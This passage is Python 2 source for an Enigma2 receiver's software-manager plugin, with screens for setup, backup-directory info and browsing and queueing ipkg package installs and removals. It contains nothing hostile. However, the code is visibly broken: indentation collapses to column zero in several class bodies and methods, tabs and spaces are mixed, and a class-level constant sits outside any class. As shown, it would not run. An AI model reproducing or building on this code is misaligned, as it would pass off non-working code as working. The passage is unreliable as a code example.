            <ePixmap pixmap="skin_default/div-h.png" position="0,400" zPosition="1" size="560,2" />
            <widget source="introduction" render="Label" position="5,410" size="550,30" zPosition="10" font="Regular;21" halign="center" valign="center" backgroundColor="#25062748" transparent="1" />
        </screen>"""

    def __init__(self, session, skin_path = None):
        Screen.__init__(self, session)
        self.session = session
        self.skin_path = skin_path
        if self.skin_path == None:
            self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
        self.onChangedEntry = [ ]
        self.setup_title = _("Software manager setup")
        # Remembered so selectionChanged() can show a per-entry hint.
        self.overwriteConfigfilesEntry = None
        self.list = [ ]
        ConfigListScreen.__init__(self, self.list, session = session, on_change = self.changedEntry)
        self["actions"] = ActionMap(["SetupActions", "MenuActions"],
        {
            "cancel": self.keyCancel,
            "save": self.apply,
            "menu": self.closeRecursive,
        }, -2)
        self["key_red"] = StaticText(_("Cancel"))
        self["key_green"] = StaticText(_("OK"))
        self["key_yellow"] = StaticText()
        self["key_blue"] = StaticText()
        self["introduction"] = StaticText()
        self.createSetup()
        self.onLayoutFinish.append(self.layoutFinished)

    def layoutFinished(self):
        self.setTitle(self.setup_title)

    def createSetup(self):
        # (Re)build the config list shown on screen.
        self.list = [ ]
        self.overwriteConfigfilesEntry = getConfigListEntry(_("Overwrite configuration files?"), config.plugins.softwaremanager.overwriteConfigFiles)
        self.list.append(self.overwriteConfigfilesEntry)
        self.list.append(getConfigListEntry(_("show softwaremanager in setup menu"), config.plugins.softwaremanager.onSetupMenu))
        self.list.append(getConfigListEntry(_("show softwaremanager on blue button"), config.plugins.softwaremanager.onBlueButton))
        self["config"].list = self.list
        self["config"].l.setSeperation(400)
        self["config"].l.setList(self.list)
        # Guard against registering the callback twice on rebuilds.
        if not self.selectionChanged in self["config"].onSelectionChanged:
            self["config"].onSelectionChanged.append(self.selectionChanged)
        self.selectionChanged()

    def selectionChanged(self):
        # Show an explanatory hint only for the "overwrite config files" entry.
        if self["config"].getCurrent() == self.overwriteConfigfilesEntry:
            self["introduction"].setText(_("Overwrite configuration files during software upgrade?"))
        else:
            self["introduction"].setText("")

    def newConfig(self):
        pass

    def keyLeft(self):
        ConfigListScreen.keyLeft(self)

    def keyRight(self):
        ConfigListScreen.keyRight(self)

    def confirm(self, confirmed):
        # Callback of the "Use these settings?" MessageBox in apply().
        if not confirmed:
            print "not confirmed"
            return
        else:
            self.keySave()
            # Reload the plugin list so menu/button visibility changes apply now.
            plugins.clearPluginList()
            plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))

    def apply(self):
        self.session.openWithCallback(self.confirm, MessageBox, _("Use these settings?"), MessageBox.TYPE_YESNO, timeout = 20, default = True)

    def cancelConfirm(self, result):
        # Discard all pending config changes when the user confirms leaving.
        if not result:
            return
        for x in self["config"].list:
            x[1].cancel()
        self.close()

    def keyCancel(self):
        if self["config"].isChanged():
            self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"), MessageBox.TYPE_YESNO, timeout = 20, default = True)
        else:
            self.close()

    # for summary:
    def changedEntry(self):
        # Notify summary listeners and refresh the hint text.
        for x in self.onChangedEntry:
            x()
        self.selectionChanged()

    def getCurrentEntry(self):
        return self["config"].getCurrent()[0]

    def getCurrentValue(self):
        return str(self["config"].getCurrent()[1].value)

    def createSummary(self):
        from Screens.Setup import SetupSummary
        return SetupSummary
class SoftwareManagerInfo(Screen):
    """Read-only information screen.

    Currently only mode == "backupinfo" is implemented: it lists the
    directories configured for settings backup.
    """
    skin = """
        <screen name="SoftwareManagerInfo" position="center,center" size="560,440" title="SoftwareManager information">
            <ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
            <widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
            <widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
            <widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
            <widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
            <widget source="list" render="Listbox" position="5,50" size="550,340" scrollbarMode="showOnDemand" selectionDisabled="0">
                <convert type="TemplatedMultiContent">
                    {"template": [
                            MultiContentEntryText(pos = (5, 0), size = (540, 26), font=0, flags = RT_HALIGN_LEFT | RT_HALIGN_CENTER, text = 0), # index 0 is the name
                        ],
                    "fonts": [gFont("Regular", 24),gFont("Regular", 22)],
                    "itemHeight": 26
                    }
                </convert>
            </widget>
            <ePixmap pixmap="skin_default/div-h.png" position="0,400" zPosition="1" size="560,2" />
            <widget source="introduction" render="Label" position="5,410" size="550,30" zPosition="10" font="Regular;21" halign="center" valign="center" backgroundColor="#25062748" transparent="1" />
        </screen>"""

    def __init__(self, session, skin_path = None, mode = None):
        Screen.__init__(self, session)
        self.session = session
        self.mode = mode
        self.skin_path = skin_path
        if self.skin_path == None:
            self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
        self["actions"] = ActionMap(["ShortcutActions", "WizardActions"],
        {
            "back": self.close,
            "red": self.close,
        }, -2)
        self.list = []
        self["list"] = List(self.list)
        self["key_red"] = StaticText(_("Close"))
        self["key_green"] = StaticText()
        self["key_yellow"] = StaticText()
        self["key_blue"] = StaticText()
        self["introduction"] = StaticText()
        self.onLayoutFinish.append(self.layoutFinished)

    def layoutFinished(self):
        self.setTitle(_("Softwaremanager information"))
        if self.mode is not None:
            self.showInfos()

    def showInfos(self):
        # Fill the list depending on the requested mode.
        if self.mode == "backupinfo":
            self.list = []
            backupfiles = config.plugins.configurationbackup.backupdirs.value
            for entry in backupfiles:
                # Single-column rows: (path,)
                self.list.append((entry,))
            self['list'].setList(self.list)
class PluginManager(Screen, PackageInfoHandler):
skin = """
<screen name="PluginManager" position="center,center" size="560,440" title="Extensions management" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="550,360" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"templates":
{"default": (51,[
MultiContentEntryText(pos = (0, 1), size = (470, 24), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (0, 25), size = (470, 24), font=1, flags = RT_HALIGN_LEFT, text = 2), # index 2 is the description
MultiContentEntryPixmapAlphaTest(pos = (475, 0), size = (48, 48), png = 5), # index 5 is the status pixmap
MultiContentEntryPixmapAlphaTest(pos = (0, 49), size = (550, 2), png = 6), # index 6 is the div pixmap
]),
"category": (40,[
MultiContentEntryText(pos = (30, 0), size = (500, 22), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (30, 22), size = (500, 16), font=2, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the description
MultiContentEntryPixmapAlphaTest(pos = (0, 38), size = (550, 2), png = 3), # index 3 is the div pixmap
])
},
"fonts": [gFont("Regular", 22),gFont("Regular", 20),gFont("Regular", 16)],
"itemHeight": 52
}
</convert>
</widget>
<widget source="status" render="Label" position="5,410" zPosition="10" size="540,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, plugin_path = None, args = None):
    """PluginManager constructor: set up widgets, key bindings and state.

    The screen alternates between a "category" view and a "packages"
    view (tracked in self.currList); getUpdateInfos() is triggered once
    the layout is finished.
    """
    Screen.__init__(self, session)
    self.session = session
    self.skin_path = plugin_path
    if self.skin_path == None:
        self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
    self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions", "InfobarEPGActions", "HelpActions" ],
    {
        "ok": self.handleCurrent,
        "back": self.exit,
        "red": self.exit,
        "green": self.handleCurrent,
        "yellow": self.handleSelected,
        "showEventInfo": self.handleSelected,
        "displayHelp": self.handleHelp,
    }, -1)
    self.list = []
    self.statuslist = []
    # selectedFiles: (detailsFile, action, packagename) tuples queued for
    # install/remove; filled and drained by handleCurrent()/detailsClosed().
    self.selectedFiles = []
    self.categoryList = []
    self.packetlist = []
    self["list"] = List(self.list)
    self["key_red"] = StaticText(_("Close"))
    self["key_green"] = StaticText("")
    self["key_yellow"] = StaticText("")
    self["key_blue"] = StaticText("")
    self["status"] = StaticText("")
    self.cmdList = []
    self.oktext = _("\nAfter pressing OK, please wait!")
    # Guard against double registration of the selection callback.
    if not self.selectionChanged in self["list"].onSelectionChanged:
        self["list"].onSelectionChanged.append(self.selectionChanged)
    # currList: "category", "packages" or "status" - drives key handling.
    self.currList = ""
    self.currentSelectedTag = None
    self.currentSelectedIndex = None
    self.currentSelectedPackage = None
    self.saved_currentSelectedPackage = None
    self.restartRequired = False
    self.onShown.append(self.setWindowTitle)
    self.onLayoutFinish.append(self.getUpdateInfos)
def setWindowTitle(self):
    """Apply the translated window title for this screen."""
    title = _("Extensions management")
    self.setTitle(title)
def exit(self):
    """Handle BACK/RED.

    In the packages view this steps back to the category view.  From any
    other view it commits: pending actions are turned into ipkg commands
    and confirmed via PluginManagerInfo, otherwise the screen closes.
    """
    if self.currList == "packages":
        # Step back from package list to the category overview,
        # restoring the previously selected category row.
        self.currList = "category"
        self.currentSelectedTag = None
        self["list"].style = "category"
        self['list'].setList(self.categoryList)
        self["list"].setIndex(self.currentSelectedIndex)
        self["list"].updateList(self.categoryList)
        self.selectionChanged()
    else:
        iSoftwareTools.cleanupSoftwareTools()
        self.prepareInstall()
        if len(self.cmdList):
            # Pending install/remove actions: ask for confirmation first.
            self.session.openWithCallback(self.runExecute, PluginManagerInfo, self.skin_path, self.cmdList)
        else:
            self.close()
def handleHelp(self):
    """Open the help screen, unless a status/progress view is showing."""
    if self.currList == "status":
        return
    self.session.open(PluginManagerHelp, self.skin_path)
def setState(self,status = None):
    """Switch the list into a one-row status view.

    status: 'update' (fetching catalog), 'sync' (rescanning installed
    packages) or 'error' (feed download failed; GREEN continues).
    """
    if status:
        self.currList = "status"
        self.statuslist = []
        # Status view has no package actions, so blank the colour keys.
        self["key_green"].setText("")
        self["key_blue"].setText("")
        self["key_yellow"].setText("")
        divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
        if status == 'update':
            statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
            self.statuslist.append(( _("Updating software catalog"), '', _("Searching for available updates. Please wait..." ),'', '', statuspng, divpng, None, '' ))
        elif status == 'sync':
            statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
            self.statuslist.append(( _("Package list update"), '', _("Searching for new installed or removed packages. Please wait..." ),'', '', statuspng, divpng, None, '' ))
        elif status == 'error':
            # Allow the user to continue with cached data after a feed error.
            self["key_green"].setText(_("Continue"))
            statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
            self.statuslist.append(( _("Error"), '', _("An error occurred while downloading the packetlist. Please try again." ),'', '', statuspng, divpng, None, '' ))
        self["list"].style = "default"
        self['list'].setList(self.statuslist)
def getUpdateInfos(self):
    """Populate the screen: reuse cached catalog data when offline,
    otherwise show the update status and query the feed."""
    have_cached_catalog = iSoftwareTools.lastDownloadDate is not None
    offline = iSoftwareTools.NetworkConnectionAvailable is False
    if have_cached_catalog and offline:
        self.rebuildList()
        return
    self.setState('update')
    iSoftwareTools.startSoftwareTools(self.getUpdateInfosCB)
def getUpdateInfosCB(self, retval = None):
    """Callback for startSoftwareTools()/getUpdates().

    retval True  -> catalog fetched: show update count and rebuild lists.
    retval False -> fetch failed: show an error on first failure, or
                    retry the update once cached data exists.
    retval None  -> nothing to do.
    """
    if retval is not None:
        if retval is True:
            # NOTE(review): 'is not 0' is an identity check that happens to
            # work for small ints in CPython; it compares the cached count.
            if iSoftwareTools.available_updates is not 0:
                self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
            else:
                self["status"].setText(_("There are no updates available."))
            self.rebuildList()
        elif retval is False:
            if iSoftwareTools.lastDownloadDate is None:
                # First download attempt failed: show the error view.
                self.setState('error')
                if iSoftwareTools.NetworkConnectionAvailable:
                    self["status"].setText(_("Updatefeed not available."))
                else:
                    self["status"].setText(_("No network connection available."))
            else:
                # We already have cached data: retry a catalog update.
                iSoftwareTools.lastDownloadDate = time()
                iSoftwareTools.list_updating = True
                self.setState('update')
                iSoftwareTools.getUpdates(self.getUpdateInfosCB)
def rebuildList(self, retval = None):
    """Redraw the list: category overview, or the packages of the
    currently chosen tag when one is active."""
    tag = self.currentSelectedTag
    if tag is None:
        self.buildCategoryList()
    else:
        self.buildPacketList(tag)
def selectionChanged(self):
    """Refresh colour-key labels and the status line for the current row.

    Labels depend on the active view (packages vs category) and, in the
    packages view, on the row's state field (entry index 4).
    """
    current = self["list"].getCurrent()
    self["status"].setText("")
    if current:
        if self.currList == "packages":
            self["key_red"].setText(_("Back"))
            # GREEN toggles the pending action for the highlighted package;
            # it is blanked when an install would be impossible offline.
            if current[4] == 'installed':
                self["key_green"].setText(_("Uninstall"))
            elif current[4] == 'installable':
                self["key_green"].setText(_("Install"))
                if iSoftwareTools.NetworkConnectionAvailable is False:
                    self["key_green"].setText("")
            elif current[4] == 'remove':
                self["key_green"].setText(_("Undo uninstall"))
            elif current[4] == 'install':
                self["key_green"].setText(_("Undo install"))
                if iSoftwareTools.NetworkConnectionAvailable is False:
                    self["key_green"].setText("")
            self["key_yellow"].setText(_("View details"))
            self["key_blue"].setText("")
            # Status line: update count, pending-selection count, or idle.
            if len(self.selectedFiles) == 0 and iSoftwareTools.available_updates is not 0:
                self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
            elif len(self.selectedFiles) is not 0:
                self["status"].setText(str(len(self.selectedFiles)) + _(" packages selected."))
            else:
                self["status"].setText(_("There are currently no outstanding actions."))
        elif self.currList == "category":
            self["key_red"].setText(_("Close"))
            self["key_green"].setText("")
            self["key_yellow"].setText("")
            self["key_blue"].setText("")
            # YELLOW starts an update or processes the pending selection.
            if len(self.selectedFiles) == 0 and iSoftwareTools.available_updates is not 0:
                self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
                self["key_yellow"].setText(_("Update"))
            elif len(self.selectedFiles) is not 0:
                self["status"].setText(str(len(self.selectedFiles)) + _(" packages selected."))
                self["key_yellow"].setText(_("Process"))
            else:
                self["status"].setText(_("There are currently no outstanding actions."))
def getSelectionState(self, detailsFile):
    """Return True if detailsFile is among the currently selected packages.

    self.selectedFiles holds (detailsFile, action, packagename) tuples;
    only the first element identifies the package.
    """
    # any() with a generator replaces the manual scan-and-return loop.
    return any(entry[0] == detailsFile for entry in self.selectedFiles)
def handleCurrent(self):
    """Handle OK/GREEN on the current row.

    Category view: drill into the tag's package list.
    Packages view: toggle the row's pending action (install <-> undo,
    remove <-> undo) and keep self.selectedFiles in sync.
    Status view: (re)start the catalog update.
    """
    current = self["list"].getCurrent()
    if current:
        if self.currList == "category":
            # Remember the row so exit() can restore it later.
            self.currentSelectedIndex = self["list"].index
            selectedTag = current[2]
            self.buildPacketList(selectedTag)
        elif self.currList == "packages":
            # current[7] is the selection marker; '' means a non-package row.
            if current[7] is not '':
                idx = self["list"].getIndex()
                detailsFile = self.list[idx][1]
                if self.list[idx][7] == True:
                    # Row was selected: drop it from the pending set.
                    for entry in self.selectedFiles:
                        if entry[0] == detailsFile:
                            self.selectedFiles.remove(entry)
                else:
                    # Row was unselected: queue it, unless it would require
                    # a download while no network connection is available.
                    alreadyinList = False
                    for entry in self.selectedFiles:
                        if entry[0] == detailsFile:
                            alreadyinList = True
                    if not alreadyinList:
                        if (iSoftwareTools.NetworkConnectionAvailable is False and current[4] in ('installable','install')):
                            pass
                        else:
                            self.selectedFiles.append((detailsFile,current[4],current[3]))
                            self.currentSelectedPackage = ((detailsFile,current[4],current[3]))
                # Flip the row's visual state to reflect the new action.
                if current[4] == 'installed':
                    self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'remove', True)
                elif current[4] == 'installable':
                    if iSoftwareTools.NetworkConnectionAvailable:
                        self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'install', True)
                elif current[4] == 'remove':
                    self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'installed', False)
                elif current[4] == 'install':
                    if iSoftwareTools.NetworkConnectionAvailable:
                        self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'installable',False)
                self["list"].setList(self.list)
                self["list"].setIndex(idx)
                self["list"].updateList(self.list)
                self.selectionChanged()
        elif self.currList == "status":
            # GREEN on the error/status view: retry the catalog update.
            iSoftwareTools.lastDownloadDate = time()
            iSoftwareTools.list_updating = True
            self.setState('update')
            iSoftwareTools.getUpdates(self.getUpdateInfosCB)
def handleSelected(self):
    """Handle YELLOW/INFO on the current row.

    Packages view: open the details screen when a details file exists.
    Category view: confirm and run the queued install/remove actions.
    """
    current = self["list"].getCurrent()
    if current:
        if self.currList == "packages":
            # current[7] == '' marks a non-package row (no details).
            if current[7] is not '':
                detailsfile = iSoftwareTools.directory[0] + "/" + current[1]
                if (os_path.exists(detailsfile) == True):
                    # Saved so detailsClosed() can drop the entry afterwards.
                    self.saved_currentSelectedPackage = self.currentSelectedPackage
                    self.session.openWithCallback(self.detailsClosed, PluginDetails, self.skin_path, current)
                else:
                    self.session.open(MessageBox, _("Sorry, no details available!"), MessageBox.TYPE_INFO, timeout = 10)
        elif self.currList == "category":
            self.prepareInstall()
            if len(self.cmdList):
                self.session.openWithCallback(self.runExecute, PluginManagerInfo, self.skin_path, self.cmdList)
def detailsClosed(self, result = None):
    """Callback when the PluginDetails screen closes.

    result is None (no action), False (nothing changed) or truthy (the
    package state changed): then show the sync view and rescan the
    installed-package list.
    """
    if result is not None:
        if result is not False:
            self.setState('sync')
            iSoftwareTools.lastDownloadDate = time()
            # Iterate over a copy: the old code removed entries from the
            # very list it was iterating, which skips the element that
            # follows each removal.
            for entry in self.selectedFiles[:]:
                if entry == self.saved_currentSelectedPackage:
                    self.selectedFiles.remove(entry)
            iSoftwareTools.startIpkgListInstalled(self.rebuildList)
# Maps a package state to its status icon file (class-level constant so
# the table is built once, not on every row).
STATE_PIXMAPS = {
    'installed': "installed.png",
    'installable': "installable.png",
    'remove': "remove.png",
    'install': "install.png",
}

def buildEntryComponent(self, name, details, description, packagename, state, selected = False):
    """Build one row tuple for the packages list.

    Returns (name, details, description, packagename, state, statuspng,
    divpng, selected), or None for an unknown state (matching the old
    implicit fall-through).  Only the pixmap actually needed is loaded;
    the old code loaded all four status icons for every row.
    """
    pixname = self.STATE_PIXMAPS.get(state)
    if pixname is None:
        return None
    divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
    statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/" + pixname))
    return((name, details, description, packagename, state, statuspng, divpng, selected))
def buildPacketList(self, categorytag = None):
    """Switch to the packages view for the given category tag.

    Collects every non-internal catalog package carrying the tag, builds
    one display row per package (status derived from the installed list
    and the pending selection), sorts by name and shows the list.
    """
    if categorytag is not None:
        self.currList = "packages"
        self.currentSelectedTag = categorytag
        self.packetlist = []
        # Pass 1: collect [name, details, shortdescription, packagename]
        # for all catalog packages that carry this tag.
        for package in iSoftwareTools.packagesIndexlist[:]:
            prerequisites = package[0]["prerequisites"]
            if prerequisites.has_key("tag"):
                for foundtag in prerequisites["tag"]:
                    if categorytag == foundtag:
                        attributes = package[0]["attributes"]
                        if attributes.has_key("packagetype"):
                            # Internal packages are never shown to the user.
                            if attributes["packagetype"] == "internal":
                                continue
                            self.packetlist.append([attributes["name"], attributes["details"], attributes["shortdescription"], attributes["packagename"]])
                        else:
                            self.packetlist.append([attributes["name"], attributes["details"], attributes["shortdescription"], attributes["packagename"]])
        # Pass 2: turn each packet into a display row with the proper
        # status: installed/remove when present on the box, otherwise
        # installable/install depending on the pending selection.
        self.list = []
        for x in self.packetlist:
            status = ""
            name = x[0].strip()
            details = x[1].strip()
            description = x[2].strip()
            if not description:
                description = "No description available."
            packagename = x[3].strip()
            selectState = self.getSelectionState(details)
            if iSoftwareTools.installed_packetlist.has_key(packagename):
                if selectState == True:
                    status = "remove"
                else:
                    status = "installed"
                self.list.append(self.buildEntryComponent(name, _(details), _(description), packagename, status, selected = selectState))
            else:
                if selectState == True:
                    status = "install"
                else:
                    status = "installable"
                self.list.append(self.buildEntryComponent(name, _(details), _(description), packagename, status, selected = selectState))
        if len(self.list):
            self.list.sort(key=lambda x: x[0])
        self["list"].style = "default"
        self['list'].setList(self.list)
        self["list"].updateList(self.list)
        self.selectionChanged()
def buildCategoryList(self):
    """Switch to the category view.

    Collects every distinct tag found in the catalog's prerequisites,
    builds one category row per tag, sorts by title and shows the list.
    """
    self.currList = "category"
    self.categories = []
    self.categoryList = []
    for package in iSoftwareTools.packagesIndexlist[:]:
        prerequisites = package[0]["prerequisites"]
        if prerequisites.has_key("tag"):
            for foundtag in prerequisites["tag"]:
                # (Dropped the old code's unused 'attributes' lookup here.)
                if foundtag not in self.categories:
                    self.categories.append(foundtag)
                    self.categoryList.append(self.buildCategoryComponent(foundtag))
    self.categoryList.sort(key=lambda x: x[0])
    self["list"].style = "category"
    self['list'].setList(self.categoryList)
    self["list"].updateList(self.categoryList)
    self.selectionChanged()
def buildCategoryComponent(self, tag = None):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if tag is not None:
if tag == 'System':
return(( _("System"), _("View list of available system extensions" ), tag, divpng ))
elif tag == 'Skin':
return(( _("Skins"), _("View list of available skins" ), tag, divpng ))
elif tag == 'Recording':
return(( _("Recordings"), _("View list of available recording extensions" ), tag, divpng ))
elif tag == 'Network':
return(( _("Network"), _("View list of available networking extensions" ), tag, divpng ))
elif tag == 'CI':
return(( _("Common Interface"), _("View list of available CommonInterface extensions" ), tag, divpng ))
elif tag == 'Default':
return(( _("Default settings"), _("View list of available default settings" ), tag, divpng ))
elif tag == 'SAT':
return(( _("Satellite equipment"), _("View list of available Satellite equipment extensions." ), tag, divpng ))
elif tag == 'Software':
return(( _("Software"), _("View list of available software extensions" ), tag, divpng ))
elif tag == 'Multimedia':
return(( _("Multimedia"), _("View list of available multimedia extensions." ), tag, divpng ))
elif tag == 'Display':
return(( _("Display and userinterface"), _("View list of available display and userinterface extensions." ), tag, divpng ))
elif tag == 'EPG':
return(( _("Electronic Program Guide"), _("View list of available EPG extensions." ), tag, divpng ))
elif tag == 'Communication':
return(( _("Communication"), _("View list of available communication extensions." ), tag, divpng ))
else: # dynamically generate non existent tags
return(( str(tag), _("View list of available ") + str(tag) + _(" extensions." ), tag, divpng ))
	def prepareInstall(self):
		"""Translate the pending selections into an ipkg command list.

		Fills self.cmdList with a global CMD_UPGRADE (when updates are
		available) followed by one CMD_INSTALL/CMD_REMOVE per selected
		plugin.  Package names are taken from the plugin's meta/details file
		when one exists on disk, otherwise from the plain package name.
		"""
		self.cmdList = []
		if iSoftwareTools.available_updates > 0:
			self.cmdList.append((IpkgComponent.CMD_UPGRADE, { "test_only": False }))
		if self.selectedFiles and len(self.selectedFiles):
			for plugin in self.selectedFiles:
				# plugin: [0]=details filename, [1]=state, [2]=package name
				# (see the append calls below; state 'installed' means "remove").
				detailsfile = iSoftwareTools.directory[0] + "/" + plugin[0]
				if (os_path.exists(detailsfile) == True):
					iSoftwareTools.fillPackageDetails(plugin[0])
					self.package = iSoftwareTools.packageDetails[0]
					if self.package[0].has_key("attributes"):
						self.attributes = self.package[0]["attributes"]
						if self.attributes.has_key("needsRestart"):
							self.restartRequired = True
						if self.attributes.has_key("package"):
							self.packagefiles = self.attributes["package"]
					if plugin[1] == 'installed':
						# Remove every package listed in the meta file, or fall
						# back to the plain package name when none are listed.
						if self.packagefiles:
							for package in self.packagefiles[:]:
								self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package["name"] }))
						else:
							self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": plugin[2] }))
					else:
						if self.packagefiles:
							for package in self.packagefiles[:]:
								self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package["name"] }))
						else:
							self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": plugin[2] }))
				else:
					# No meta file on disk: operate on the bare package name.
					if plugin[1] == 'installed':
						self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": plugin[2] }))
					else:
						self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": plugin[2] }))
def runExecute(self, result = None):
if result is not None:
if result[0] is True:
self.session.openWithCallback(self.runExecuteFinished, Ipkg, cmdList = self.cmdList)
elif result[0] is False:
self.cmdList = result[1]
self.session.openWithCallback(self.runExecuteFinished, Ipkg, cmdList = self.cmdList)
else:
self.close()
def runExecuteFinished(self):
self.reloadPluginlist()
if plugins.restartRequired or self.restartRequired:
self.session.openWithCallback(self.ExecuteReboot, MessageBox, _("Installation or removal has completed.") + "\n" +_("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
else:
self.selectedFiles = []
self.restartRequired = False
self.detailsClosed(True)
def ExecuteReboot(self, result):
if result:
self.session.open(TryQuitMainloop,retvalue=3)
else:
self.selectedFiles = []
self.restartRequired = False
self.detailsClosed(True)
	def reloadPluginlist(self):
		# Re-read the plugin directory so freshly (un)installed plugins show up.
		plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class PluginManagerInfo(Screen):
	"""Confirmation screen listing the install/remove/upgrade tasks the plugin
	manager is about to execute.

	Closes with (True, None) when all tasks should run, with
	(False, filtered_cmdlist) when only the install/remove tasks were chosen,
	or with no result on cancel.
	"""
	skin = """
		<screen name="PluginManagerInfo" position="center,center" size="560,450" title="Plugin manager activity information" >
			<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
			<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
			<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
			<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
			<widget source="list" render="Listbox" position="5,50" size="550,350" scrollbarMode="showOnDemand" selectionDisabled="1">
				<convert type="TemplatedMultiContent">
					{"template": [
							MultiContentEntryText(pos = (50, 0), size = (150, 26), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
							MultiContentEntryText(pos = (50, 27), size = (540, 23), font=1, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the state
							MultiContentEntryPixmapAlphaTest(pos = (0, 1), size = (48, 48), png = 2), # index 2 is the status pixmap
							MultiContentEntryPixmapAlphaTest(pos = (0, 48), size = (550, 2), png = 3), # index 3 is the div pixmap
						],
					"fonts": [gFont("Regular", 24),gFont("Regular", 22)],
					"itemHeight": 50
					}
				</convert>
			</widget>
			<ePixmap pixmap="skin_default/div-h.png" position="0,404" zPosition="10" size="560,2" transparent="1" alphatest="on" />
			<widget source="status" render="Label" position="5,408" zPosition="10" size="550,44" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
		</screen>"""

	def __init__(self, session, plugin_path, cmdlist = None):
		"""cmdlist: list of (command, args) pairs as built by prepareInstall."""
		Screen.__init__(self, session)
		self.session = session
		self.skin_path = plugin_path
		self.cmdlist = cmdlist
		self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
		{
			"ok": self.process_all,
			"back": self.exit,
			"red": self.exit,
			"green": self.process_extensions,
		}, -1)
		self.list = []
		self["list"] = List(self.list)
		self["key_red"] = StaticText(_("Cancel"))
		self["key_green"] = StaticText(_("Only extensions."))
		self["status"] = StaticText(_("Following tasks will be done after you press OK!"))
		self.onShown.append(self.setWindowTitle)
		self.onLayoutFinish.append(self.rebuildList)

	def setWindowTitle(self):
		self.setTitle(_("Plugin manager activity information"))

